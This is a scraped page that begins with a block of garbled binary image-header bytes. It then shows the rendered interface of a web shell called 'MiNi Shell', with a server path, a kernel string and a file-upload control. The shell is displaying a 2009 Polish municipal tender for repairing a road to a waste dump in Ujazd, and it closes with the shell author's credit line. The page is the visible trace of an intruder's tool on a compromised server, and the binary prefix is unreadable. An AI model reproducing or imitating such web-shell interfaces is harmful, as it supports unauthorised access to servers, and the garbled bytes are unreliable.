JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/52257-N-2009.html

<p class="kh_header"><b>Ujazd: Przywrócenie  do stanu pierwotnego drogi dojazdowej do składowiska odpadów w Balcarzowicach</b><br>
<b>Numer ogłoszenia: 52257 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ujazd , ul. Sławięcicka 19, 47-143 Ujazd, woj. opolskie, tel. 0-77 4048750,4048757,4048757, faks 0-77 4637081.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przywrócenie  do stanu pierwotnego drogi dojazdowej do składowiska odpadów w Balcarzowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. W skład przedmiotu zamówienia wchodzą:
 
1.Rozebranie nawierzchni z mas mineralno-bitumicznych .
2.Rozebranie nawierzchni z tłucznia  .
3.Rozebranie chodników z płyt  betonowych .
4. Rozebranie  obrzeży  trawnikowych  .
5. Rozebranie krawężników  betonowych .
6. Korytowanie  mechaniczne drogi.  
7. Roboty ziemne.
8. Wykonanie warstwy dolnej podbudowy drogi .
9. Wykonanie warstwy górnej  podbudowy z kruszywa.
10. Wykonanie obrzeży  betonowych .
11.Wykonanie chodników z kostki brukowej  betonowej grubości 6 cm na podsypce  cementowo-piaskowej z wypełnieniem  spoin piaskiem .
12. Mechaniczne oczyszczenie i skropienie  emulsją asfaltową na zimno podbudowy lub nawierzchni  betonowej ,
13. Wykonanie nawierzchni z mieszanek mineralno- bitumicznych  asfaltowych  o grubości 4 cm/ warstwa wiążąca/ .
14. Wykonanie nawierzchni z mieszanek mineralno-bitumicznych  asfaltowych  o grubości 4 cm/warstwa ścieralna/ ,
15. Wykonanie nawierzchnie  z kamienia tłuczonego -warstwa górna o gr. 10 cm , utwardzenie  poboczy kruszywem kamiennym , 

B. Zestawienie powierzchni poszczególnych części  zagospodarowania terenu 
- długość drogi - 188,0 m 
- nawierzchnia jezdni  z masy asfaltobetonowej - 683,75 m 2  
- pobocza utwardzone kruszywem -186,50 m2  .

Projektowana droga jest drogą Gminną wewnętrzną , dojazdową kategorii D. 
Obecnie cała droga oraz wjazd na drogę powiatową jest zniszczony przez ciężki sprzęt transportujący odpady powstałe w wyniku huraganu w dniu 15.08.2008r.  na tymczasowe składowisko odpadó1)w.  Zniszczone  również chodniki przy drodze powiatowej po obu stronach wjazdu, które należy odtworzyć..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.23.32.26-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III  WARUNKI UCZESTNICTWA W PRZETARGU

Wykonawca przystępujący do przetargu powinien spełniać następujące wymagania:
1. Sytuacja finansowa:
a)	wykonawca musi mieć dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, określonymi co najmniej na sumę 100 000,00 zł, co winno jednoznacznie wynikać z dokumentu określonego w  pkt. IV. 1.4.8/, 
b)	posiadać średnio roczny obrót w ciągu ostatnich trzech lat w zakresie wykonawstwa robót w wysokości   200 000,00 zł,   potwierdzony jak w pkt. IV-1.4.7/.

2.	Potencjał   kadrowy:   
2.1Zatrudniać lub dysponować odpowiednio wykwalifikowanym personelem 
posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności:
-  budowy dróg 
Wymagany kierownik budowy powinien posiadać uprawnienia do kierowania robotami
drogowymi . 

Powyższe wymagania muszą być udokumentowane jak w pkt IV 1.4.4/,

3. Doświadczenie zawodowe :
    Wykonawca musi udowodnić poprzez przedstawienie w załączniku określonym w pkt. IV.1.4.6/ oraz dołączenie dokumentów określonych w pkt. IV.1.4.6/, potwierdzających zrealizowanie w charakterze głównego wykonawcy w okresie ostatnich pięciu lat co najmniej trzy zadania o zakresie finansowym, charakterze i złożoności porównywalnej z zakresem opisanego w pkt. I zamówienia. Żądanie to  ma odpowiadać zakresowi finansowemu, charakterowi i złożoności porównywalnej z zakresem zamówienia.

Jako zadanie o charakterze i złożoności porównywalnej z przedmiotem zamówienia i zakresem rzeczowo - finansowym  zamawiający rozumie realizacje dotyczące wykonania budowy dróg i chodników  .
Jako referencje dotyczące realizacji z ostatnich 5 lat zamawiający uzna te referencje, które dotyczą realizacji tych zadań, których zakończenie miało miejsce nie wcześniej jak w roku 2004.
Jako roboty o porównywalnym zakresie finansowym zamawiający uzna te zadania, których wartość jest nie niższa niż brutto 100 000,00   zł.

4	Potencjał sprzętowy:
Wykonawca musi dysponować sprzętem i środkami transportowymi niezbędnymi do wykonywania robót/ ładowarki, samochody ciężarowe , młoty pneumatyczne , koparki /
co należy udokumentować jak pkt IV 1.4. 5/.

5	Wykonawstwo robót
Przedmiot zamówienia  należy wykonać siłami własnymi wykonawcy. 

6.  Ubezpieczenie:
Wykonawca powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie      prowadzonej działalności gospodarczej na kwotę co najmniej 
100 000,00 zł, w okresie realizacji zamówienia, co winno wynikać z dokumentu określonego w pkt. IV.1.4.9/ 


7. Gwarancja:
Wykonawca powinien udzielić na przedmiot zamówienia  3 lata gwarancji.

-	Złożenie oferty jest jednoznaczne z akceptacją w całości warunków zawartych w niniejszej specyfikacji jako wyłącznej podstawy przetargu.
-	Od uczestników oczekuje się starannego zapoznania się z projektem, dostarczoną specyfikacją istotnych warunków zamówienia, a także dokonania wizji lokalnej na terenie budowy oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty i podpisania umowy.
-	Zamawiający odrzuci oferty zgodnie z art. 89 i art.90 ustawy prawo zamówień publicznych, jeżeli są niezgodne z ustawą lub ich treść nie odpowiada treści specyfikacji istotnych warunków zamówienia.
-	Zamawiający dokona wykluczenia wykonawców zgodnie z treścią art. 24 ust 1 i 2
a w szczególności tych, którzy nie złożyli wraz z ofertą oświadczeń i dokumentów określonych w pkt. IV.
-	Oferty wykonawców, którzy zostali wykluczeni traktowane będą jako odrzucone.
-	Wykonawca ponosi wszelkie koszty związane ze sporządzeniem i złożeniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta powinna zawierać następujące dokumenty i oświadczenia:
1.1.	Wypełniony szczegółowo formularz oferty, część A SIWZ
1.2.	Dowód wpłacenia / wniesienia / wadium w wysokości    2 000,00  zł.
1.3.	Kosztorys ofertowy szczegółowy z cenami jednostkowymi i wartością robót stanowiącą wartość ryczałtową zamówienia.
1.4.	 Dane dotyczące wiarygodności prawnej, finansowej i technicznej oferenta:
0. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania wykonawcy odpowiada przedmiotowi zamówienia oraz wskazujące osoby upoważnione do dokonywania czynności prawnych w imieniu wykonawcy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.Oświadczenie z art. 22 ust 1 Prawo zamówień publicznych oraz, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawo zamówień publicznych z dnia 29.01.2004 r. na załączniku nr VI wraz z aktualnym zaświadczeniem właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych, lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2Aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8, ustawy Prawo zamówień publicznych, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - nie dotyczy.
3)   Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy jw. wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - nie dotyczy.
4) Wykaz kierownictwa i pracowników odpowiedzialnych za realizację prac na załączonym druku nr II z udokumentowaniem ich kwalifikacji zawodowych / uprawnienia / z uwzględnieniem spełnienia wymogów pkt. III - 2
5) Wykaz podstawowego sprzętu jakim dysponuje wykonawca przewidzianego do wykonania zamówienia na załączonym druku nr III, z uwzględnieniem wymogu pkt. III - 4.
6)	Wykaz wykonanych w ciągu ostatnich 5 lat robót budowlanych odpowiadających swoim rodzajem i wartością robotom drogowym  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania na załączniku nr IV, wraz z co najmniej trzema referencjami ( dokumentami ) od poprzednich zamawiających zgodnie z wymaganiami pkt. III - 3, potwierdzającymi, że roboty zostały wykonane należycie.
7)	Oświadczenie wykonawcy, iż posiada on średnio roczny obrót w ciągu ostatnich trzech lat w zakresie wykonawstwa robót w wysokości określonej w pkt. III.1.b, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
8)	Oświadczenie wykonawcy, iż posiada on dostęp lub dysponuje środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia, określonymi na sumę określoną w pkt. III.1.a
9)	Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie określonym w pkt. III - 6.
1.5.     Zaparafowany przez upoważnioną do reprezentacji wykonawcy osobę ( osoby ) projekt 
           umowy.

UWAGI:
-	dokumenty z pkt. 1.4.0 - 1.4.9, muszą być przedstawione w formie określonej w rozporządzeniu Prezesa Rady Ministrów z dnia 7 kwietnia 2004 roku, w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.. U. Nr 71, poz. 645)
-	oferty muszą spełniać warunki formalne:  właściwy sposób reprezentacji zgodny z  właściwym wypisem z rejestru, nadto zaznacza się, że forma prawna prowadzonej działalności winna być dostosowana do obowiązujących aktualnie przepisów prawa,  a mianowicie:
-	ustawa z 15 września 2000 roku - Kodeks spółek handlowych ( Dz. U. z 2000 roku nr 94 poz. 1037 ),
-	ustawa z 20 sierpnia 1997 roku o Krajowym Rejestrze Sądowym ( Dz. U. z 1997 roku nr 121 poz. 769 z późn zmianami ),
-	ustawa z 20 sierpnia1997 roku Przepisy wprowadzające ustawę o Krajowym Rejestrze Sądowym ( Dz. U. z 1997 roku nr 121 poz. 770 z późn. zmianami ),
zatem podmioty zobowiązane na mocy wyżej wymienionych przepisów do dostosowania swojej formy prawnej winny dołączyć do oferty odpowiednie dokumenty zaświadczające o ciągłości prowadzonej działalności gospodarczej;
-	złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów albo nierzetelnych oświadczeń zagrożone jest karą pozbawienia wolności 
[ art. 297 ustawy z dnia  6.06.1997 roku - Kodeks Karny [ Dz. U. z dnia 2.08.1997 roku] i zgodnie z przepisami prawo zamówień publicznych powoduje wykluczenie oferenta z postępowania prawo zamówień publicznych.

2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania za granicą, zamiast dokumentów, o których mowa w pkt 1.4.1 składa odpowiedni dokument, lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę, lub miejsce zamieszkania potwierdzające, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
-	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne, albo ze uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.1.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 2. można je zastąpić dokumentem zawierającym oświadczenie złożonym przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
2.2.Dokumenty i oświadczenia, o których mowa w pkt. 2., są składane w formie odpisu, wypisu, wyciągu lub przetłumaczonych na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów.

3. Oferta wspólna składana przez dwa lub więcej podmiotów gospodarczych musi spełniać następujące warunki:
3.1.Spełniać warunki określone w pkt. III przy uwzględnieniu zsumowania danych od wszystkich podmiotów;
3.2.Zawierać dokumenty i oświadczenia wymienione w pkt. od 1.4.0 do 1.4.9 dotyczące każdego podmiotu; pozostałe dokumenty winny dotyczyć oferenta.
3.3.Musi być podpisana w taki sposób, by zobowiązywała prawnie wszystkie Strony;
3.4.W razie złożenia oferty wspólnej wykonawcy ustanowią pełnomocnika upoważnionego do reprezentowania wszystkich w niniejszym postępowaniu o udzielenie zamówienia publicznego Jeden z podmiotów zostanie wyznaczony jako odpowiedzialny i jego upoważnienie będzie udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli pozostałych podmiotów;
3.5.Zawierać umowę konsorcjum w rozumieniu Polskiej Normy - PN - ISO 6707-2, która stwierdza, że wszystkie podmioty będą solidarnie odpowiedzialne prawnie za realizację umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.ujazd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ujeździe 
ul. Sławięcicka 19
47-143 Ujazd , pok. nr 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Urząd Miejski w Ujeździe 
ul. Sławięcicka 19
47-143 Ujazd , pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com